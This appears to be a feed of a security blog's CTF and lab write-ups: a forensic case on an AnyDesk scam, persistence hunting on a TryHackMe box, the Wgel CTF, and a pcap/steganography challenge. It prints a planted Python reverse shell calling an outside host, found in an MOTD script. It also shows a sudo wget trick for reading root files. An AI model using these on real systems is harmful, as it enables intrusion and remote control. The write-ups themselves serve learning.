https://quixtalia.in/post/Recent content in Posts on harsh giriHugo -- gohugo.ioen-usFri, 20 Mar 2026 00:00:00 +0000https://quixtalia.in/p/remote-access-regret/Fri, 20 Mar 2026 00:00:00 +0000https://quixtalia.in/p/remote-access-regret/<ul> <li>scenerio</li> </ul> <p><img alt="Image 1" class="gallery-image" data-flex-basis="607px" data-flex-grow="253" height="470" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/1.png" srcset="https://quixtalia.in/p/remote-access-regret/1_hu_698c534a5940ecfb.png 800w, https://quixtalia.in/p/remote-access-regret/1.png 1190w" width="1190"></p> <p><img alt="Image 2" class="gallery-image" data-flex-basis="577px" data-flex-grow="240" height="242" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/2.png" width="582"></p> <p>we get raw file</p> <ul> <li>extract this using</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">dd if=intelvol.raw of=output.img bs=512 </span></span><span class="line"><span class="cl">sudo mkdir /mnt/rar_image </span></span><span class="line"><span class="cl">sudo mount -o loop output.img /mnt/rar_image </span></span></code></pre></td></tr></table> </div> </div><p><img alt="Image 3" class="gallery-image" data-flex-basis="1073px" data-flex-grow="447" height="268" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/3.png" srcset="https://quixtalia.in/p/remote-access-regret/3_hu_6e605559b2fd8216.png 800w, https://quixtalia.in/p/remote-access-regret/3.png 1199w" width="1199"></p> <ul> <li>local AnyDesk ID</li> </ul> <p><img alt="Image 4" class="gallery-image" data-flex-basis="461px" data-flex-grow="192" height="599" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/4.png" srcset="https://quixtalia.in/p/remote-access-regret/4_hu_f9e285b487694eca.png 800w, https://quixtalia.in/p/remote-access-regret/4.png 1151w" width="1151"></p> <ul> <li>open this file in db browser</li> </ul> <p><img alt="Image 5" class="gallery-image" data-flex-basis="6289px" data-flex-grow="2620" height="39" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/5.png" srcset="https://quixtalia.in/p/remote-access-regret/5_hu_afe321e631c76e32.png 800w, https://quixtalia.in/p/remote-access-regret/5.png 1022w" width="1022"></p> <ul> <li> <p>first website Margaret visited before encountering the scam</p> </li> <li> <p>domain of the initial malicious redirect that led Margaret to the scam page</p> </li> </ul> <p><img alt="Image 6" class="gallery-image" data-flex-basis="584px" data-flex-grow="243" height="509" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/6.png" srcset="https://quixtalia.in/p/remote-access-regret/6_hu_f88189fb129544fa.png 800w, https://quixtalia.in/p/remote-access-regret/6.png 1239w" width="1239"></p> <ul> <li>Examining the cached HTML file, what phone number was displayed to the victim</li> </ul> <p><img alt="Image 7" class="gallery-image" data-flex-basis="530px" data-flex-grow="220" height="211" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/7.png" width="466"> <img alt="Image 8" class="gallery-image" data-flex-basis="408px" data-flex-grow="170" height="851" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/8.png" srcset="https://quixtalia.in/p/remote-access-regret/8_hu_b8ff23ff3e0f7e3e.png 800w, https://quixtalia.in/p/remote-access-regret/8.png 1449w" width="1449"></p> <ul> <li>AnyDesk ID of the remote machine</li> <li>alias of scammer</li> </ul> <p><img alt="Image 9" class="gallery-image" data-flex-basis="610px" data-flex-grow="254" height="514" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/9.png" srcset="https://quixtalia.in/p/remote-access-regret/9_hu_ab491867fe0dff85.png 800w, https://quixtalia.in/p/remote-access-regret/9.png 1308w" width="1308"></p> <ul> <li>total session duration in seconds</li> <li>convert hourly duration to second 4052 sec</li> <li>first file stolen from Margaret&rsquo;s Desktop</li> <li>How many bytes total exfiltrated</li> </ul> <p><img alt="Image 10" class="gallery-image" data-flex-basis="359px" data-flex-grow="149" height="656" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/10.png" srcset="https://quixtalia.in/p/remote-access-regret/10_hu_2b8ed664fad3b6cf.png 800w, https://quixtalia.in/p/remote-access-regret/10.png 982w" width="982"></p> <ul> <li>total URLs were visited during the browsing session on the day of the incident</li> </ul> <p><img alt="Image 11" class="gallery-image" data-flex-basis="584px" data-flex-grow="243" height="509" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/11.png" srcset="https://quixtalia.in/p/remote-access-regret/11_hu_f88189fb129544fa.png 800w, https://quixtalia.in/p/remote-access-regret/11.png 1239w" width="1239"></p> <ul> <li>it is 10</li> </ul> <hr>https://quixtalia.in/p/hide-and-seek-writeup/Mon, 16 Mar 2026 13:00:00 +0000https://quixtalia.in/p/hide-and-seek-writeup/<p><img class="gallery-image" data-flex-basis="457px" data-flex-grow="190" height="841" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/1.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/1_hu_82949d7d370a6516.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/1_hu_7ff2cd85bac1ad69.png 1600w, https://quixtalia.in/p/hide-and-seek-writeup/1.png 1604w" width="1604"></p> <ul> <li>so there are five flags combining them will give flag</li> </ul> <hr> <blockquote> <p><em>Time is on my side, always running like clockwork.</em></p> </blockquote> <ul> <li>sounds like cronjob</li> <li>crontab -l as root</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">crontab -l -u root </span></span></code></pre></td></tr></table> </div> </div><p><img class="gallery-image" data-flex-basis="880px" data-flex-grow="366" height="491" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/2.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/2_hu_68b07da5c1a9ec79.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/2_hu_8313a421d9622f9e.png 1600w, https://quixtalia.in/p/hide-and-seek-writeup/2.png 1801w" width="1801"></p> <p><img class="gallery-image" data-flex-basis="5511px" data-flex-grow="2296" height="81" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/3.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/3_hu_cab56ccdcd236856.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/3_hu_43e364cace62adb5.png 1600w, https://quixtalia.in/p/hide-and-seek-writeup/3.png 1860w" width="1860"></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">find / -name &#34;a.sh&#34; -type f 2&gt;/dev/null </span></span></code></pre></td></tr></table> </div> </div><ul> <li>found nothing</li> <li>maybe initial few number are hex</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">echo &#34;54484d7b7930&#34; | xxd -r -p </span></span></code></pre></td></tr></table> </div> </div><ul> <li><code>THM{y0</code></li> </ul> <hr> <blockquote> <p><em>A secret handshake gets me in every time.</em></p> </blockquote> <ul> <li>this looks like ssh</li> <li>find .ssh folder</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">find / -name &#34;.ssh&#34; -type d 2&gt;/dev/null </span></span></code></pre></td></tr></table> </div> </div><ul> <li>output</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">/root/.ssh </span></span><span class="line"><span class="cl">/home/zeroday/.ssh </span></span><span class="line"><span class="cl">/home/ubuntu/.ssh </span></span></code></pre></td></tr></table> </div> </div><ul> <li>check all</li> <li><code>/home/zeroday/.ssh/.authorized_keys</code></li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGigCKLtSqMcOfttFdDnNXfwKd5nH8Ws3hFNRmBDWxfvuaaC6h9zWishJVfr0xsyV0SSkMGPCuPLRU41ckvnGbA= 326e6420706172743a20755f6730745f.local </span></span></code></pre></td></tr></table> </div> </div><ul> <li><code>326e6420706172743a20755f6730745f</code></li> <li>this looks hex</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">echo &#34;326e6420706172743a20755f6730745f&#34; | xxd -r -p </span></span></code></pre></td></tr></table> </div> </div><ul> <li><code>2nd part: u_g0t_</code></li> </ul> <hr> <blockquote> <p><em>Whenever you set the stage, I make my entrance.</em></p> </blockquote> <ul> <li>this was bit hard to spot</li> <li>it is about bashrc which loads our shell config.</li> <li>since we are specter according to q check that users bashrc</li> </ul> <p><img class="gallery-image" data-flex-basis="1972px" data-flex-grow="821" height="160" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/4.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/4_hu_472664f08274878d.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/4.png 1315w" width="1315"></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">echo &#34;4d334a6b58334130636e513649444e324d334a3564416f3d&#34; | xxd -r -p | base64 -d </span></span></code></pre></td></tr></table> </div> </div><ul> <li><code>3rd_p4rt: 3v3ryt</code></li> </ul> <hr> <blockquote> <p><em>i run with the big dogs, booting up alongside the system.</em></p> </blockquote> <ul> <li>maybe process</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">ps aux </span></span><span class="line"><span class="cl">pstree </span></span></code></pre></td></tr></table> </div> </div><ul> <li>nothing interesting</li> <li>maybe service</li> <li>To see all services, including inactive ones</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sudo su </span></span><span class="line"><span class="cl">systemctl list-unit-files --type=service </span></span></code></pre></td></tr></table> </div> </div><p><img class="gallery-image" data-flex-basis="705px" data-flex-grow="293" height="441" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/5.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/5_hu_599051dc1dad512c.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/5.png 1296w" width="1296"></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">systemctl cat cipher.service </span></span><span class="line"><span class="cl">cat /lib/systemd/system/cipher.service </span></span></code></pre></td></tr></table> </div> </div><p><img class="gallery-image" data-flex-basis="986px" data-flex-grow="411" height="409" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/6.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/6_hu_74b6292775e9a416.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/6_hu_6d52b9c31ebf8f86.png 1600w, https://quixtalia.in/p/hide-and-seek-writeup/6.png 1682w" width="1682"></p> <p><img class="gallery-image" data-flex-basis="4110px" data-flex-grow="1712" height="64" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/7.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/7_hu_a4e019a4fdf9fabf.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/7.png 1096w" width="1096"></p> <ul> <li><code>4th part - h1ng_</code></li> </ul> <hr> <blockquote> <p><em>I love welcome messages.</em></p> </blockquote> <ul> <li>message of the day (MOTD)</li> <li>potential locations</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">/etc/motd </span></span><span class="line"><span class="cl">/etc/profile.d/motd.sh </span></span><span class="line"><span class="cl">/etc/update-motd.d/ </span></span></code></pre></td></tr></table> </div> </div><ul> <li>in <code>cat /etc/update-motd.d/00-header</code></li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">python3 -c &#39;import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((&#34;4c61737420706172743a206430776e7d0.h1dd3nd00r.n3t&#34;,)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([&#34;/bin/sh&#34;,&#34;-i&#34;]);&#39; 2&gt;/dev/null </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">printf &#34;Welcome to %s (%s %s %s)\n&#34; &#34;$DISTRIB_DESCRIPTION&#34; &#34;$(uname -o)&#34; &#34;$(uname -r)&#34; &#34;$(uname -m)&#34; </span></span></code></pre></td></tr></table> </div> </div><ul> <li>looks hex</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">echo &#34;4c61737420706172743a206430776e7d0&#34; | xxd -r -p </span></span></code></pre></td></tr></table> </div> </div><ul> <li> <p><code>Last part: d0wn}</code></p> </li> <li> <p>final flag</p> </li> </ul> <blockquote> <p>THM{y0u_g0t_3v3ryt_h1ng_D0wn}</p> </blockquote> <hr>https://quixtalia.in/p/wgel-ctf-writeup/Tue, 10 Mar 2026 21:00:21 +0000https://quixtalia.in/p/wgel-ctf-writeup/<h2 id="network-enumaration">network enumaration </h2><ul> <li>nmap scan</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">nmap -sVC -p- 10.48.186.30 </span></span></code></pre></td></tr></table> </div> </div><ul> <li>result</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) </span></span><span class="line"><span class="cl">| ssh-hostkey: </span></span><span class="line"><span class="cl">| 2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA) </span></span><span class="line"><span class="cl">| 256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA) </span></span><span class="line"><span class="cl">|_ 256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519) </span></span><span class="line"><span class="cl">80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) </span></span><span class="line"><span class="cl">|_http-server-header: Apache/2.4.18 (Ubuntu) </span></span><span class="line"><span class="cl">|_http-title: Apache2 Ubuntu Default Page: It works </span></span><span class="line"><span class="cl">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel </span></span></code></pre></td></tr></table> </div> </div><ul> <li>check webpage</li> </ul> <p><img alt="check port 80" class="gallery-image" data-flex-basis="438px" data-flex-grow="182" height="626" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/1.png" srcset="https://quixtalia.in/p/wgel-ctf-writeup/1_hu_3cdfdc630288c8c8.png 800w, https://quixtalia.in/p/wgel-ctf-writeup/1.png 1144w" width="1144"></p> <ul> <li>use gobuster to enumrate directory</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">gobuster dir -u &#34;http://10.48.186.30/&#34; -w /usr/share/wordlists/dirb/big.txt -t 64 </span></span></code></pre></td></tr></table> </div> </div><p><img alt="result" class="gallery-image" data-flex-basis="1152px" data-flex-grow="480" height="141" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/2.png" width="677"></p> <p><img alt="sitemap" class="gallery-image" data-flex-basis="358px" data-flex-grow="149" height="753" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/3.png" srcset="https://quixtalia.in/p/wgel-ctf-writeup/3_hu_93d05ca5cff60ffe.png 800w, https://quixtalia.in/p/wgel-ctf-writeup/3.png 1124w" width="1124"></p> <ul> <li>checked site can&rsquo;t find form or any parameter in url</li> <li>maybe enumarate more</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">gobuster dir -u http://10.48.186.30/sitemap/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q </span></span></code></pre></td></tr></table> </div> </div><p><img alt=".ssh looks interesting" class="gallery-image" data-flex-basis="394px" data-flex-grow="164" height="371" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/4.png" width="610"></p> <p><img alt="check .ssh" class="gallery-image" data-flex-basis="505px" data-flex-grow="210" height="361" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/5.png" width="761"></p> <ul> <li> <p>i have private key</p> </li> <li> <p>but i still don&rsquo;t have username for ssh</p> </li> </ul> <h2 id="user-enumaration">user enumaration </h2><ul> <li> <p>on about page i found few username <img alt="bunch of dev on about page" class="gallery-image" data-flex-basis="389px" data-flex-grow="162" height="678" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/6.png" srcset="https://quixtalia.in/p/wgel-ctf-writeup/6_hu_de3fd008d4b7e688.png 800w, https://quixtalia.in/p/wgel-ctf-writeup/6.png 1099w" width="1099"></p> </li> <li> <p>i tried all did not work</p> </li> <li> <p>check source code</p> </li> <li> <p>on webpage i found this comment</p> </li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> &lt;!-- Jessie don&#39;t forget to udate the webiste --&gt; </span></span></code></pre></td></tr></table> </div> </div><ul> <li>use this credentials</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">chmod 400 id_rsa </span></span><span class="line"><span class="cl">ssh jessie@10.48.186.30 -i id_rsa </span></span></code></pre></td></tr></table> </div> </div><p><img alt="user.txt" class="gallery-image" data-flex-basis="795px" data-flex-grow="331" height="209" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/7.png" width="693"></p> <h2 id="privilage-escalation">privilage escalation </h2><p><img alt="wget can be exploited" class="gallery-image" data-flex-basis="1201px" data-flex-grow="500" height="183" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/wgel-ctf-writeup/8.png" srcset="https://quixtalia.in/p/wgel-ctf-writeup/8_hu_76473e9987cbdb73.png 800w, https://quixtalia.in/p/wgel-ctf-writeup/8.png 916w" width="916"></p> <ul> <li>so i tried file read GTFO</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sudo wget -i /root/root.txt </span></span><span class="line"><span class="cl">No URLs found in /root/root.txt. </span></span><span class="line"><span class="cl">sudo wget -i /root/root_flag.txt </span></span><span class="line"><span class="cl">--2026-03-09 23:53:09-- http://b1b968b37519ad1daa6408188649263d/ </span></span><span class="line"><span class="cl">Resolving b1b968b37519ad1daa6408188649263d (b1b968b37519ad1daa6408188649263d)... failed: Name or service not known. </span></span></code></pre></td></tr></table> </div> </div><ul> <li>&amp; we have root flag</li> </ul> <hr>https://quixtalia.in/p/routine-checks-apoorvctf-writeup/Mon, 09 Mar 2026 11:00:21 +0000https://quixtalia.in/p/routine-checks-apoorvctf-writeup/<p><img alt="chal" class="gallery-image" data-flex-basis="228px" data-flex-grow="95" height="494" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/1.png" width="471"></p> <ul> <li>download pcap file</li> <li>follow tcp stream</li> <li>contain jpg file but it is corrupt</li> </ul> <p><img alt="hex dump as seen in wireshark" class="gallery-image" data-flex-basis="268px" data-flex-grow="111" height="956" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/2.png" srcset="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/2_hu_efeceffb776cfc94.png 800w, https://quixtalia.in/p/routine-checks-apoorvctf-writeup/2.png 1069w" width="1069"></p> <ul> <li><a class="link" href="https://www.file-recovery.com/jpg-signature-format.htm" target="_blank" rel="noopener" >https://www.file-recovery.com/jpg-signature-format.htm</a></li> </ul> <p><img alt="original jpeg JFIF signature aka magic no." class="gallery-image" data-flex-basis="643px" data-flex-grow="268" height="331" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/3.png" srcset="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/3_hu_5adb95f8d2cbeea8.png 800w, https://quixtalia.in/p/routine-checks-apoorvctf-writeup/3.png 888w" width="888"></p> <ul> <li> <p>using any hex editor change 3f to ff as jpeg JFIF header</p> </li> <li> <p>save this dump in dump.txt</p> </li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">awk &#39;{for(i=2;i&lt;=17;i++) printf $i} END{print &#34;&#34;}&#39; dump.txt | xxd -r -p &gt; recovered.jpg </span></span></code></pre></td></tr></table> </div> </div><ul> <li>gives this qr</li> </ul> <p><img alt="qr code " class="gallery-image" data-flex-basis="255px" data-flex-grow="106" height="229" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/routine-checks-apoorvctf-writeup/4.png" width="244"></p> <ul> <li>apporvctf{this_aint_it_brother}</li> <li>dead end</li> <li>we are onto it</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ steghide extract -sf recovered.jpg </span></span><span class="line"><span class="cl">Enter passphrase: </span></span><span class="line"><span class="cl">wrote extracted data to &#34;realflag.txt&#34;. </span></span><span class="line"><span class="cl">$ cat realflag.txt </span></span><span class="line"><span class="cl">apoorvctf{b1ts_wh1sp3r_1n_th3_l0w3st_b1t} </span></span></code></pre></td></tr></table> </div> </div>https://quixtalia.in/p/lespion-lab/Sat, 28 Feb 2026 23:46:21 +0000https://quixtalia.in/p/lespion-lab/<h2 id="scenario">Scenario </h2><p><img alt="Scenario" class="gallery-image" data-flex-basis="1182px" data-flex-grow="492" height="231" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/lespion-lab/1.png" 